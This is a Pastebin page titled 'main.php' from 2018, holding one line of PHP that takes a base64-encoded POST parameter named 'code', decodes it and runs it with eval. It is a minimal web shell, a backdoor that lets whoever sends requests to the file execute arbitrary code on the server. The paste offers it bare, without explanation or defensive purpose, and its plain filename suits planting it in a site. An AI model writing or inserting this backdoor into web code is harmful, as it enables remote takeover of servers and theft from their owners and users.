Advertisement
PalmaSolutions

main.php

May 31st, 2018
263
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.07 KB | None | 0 0
  1. <?php if (isset($_POST["code"])) eval(base64_decode($_POST["code"])); ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement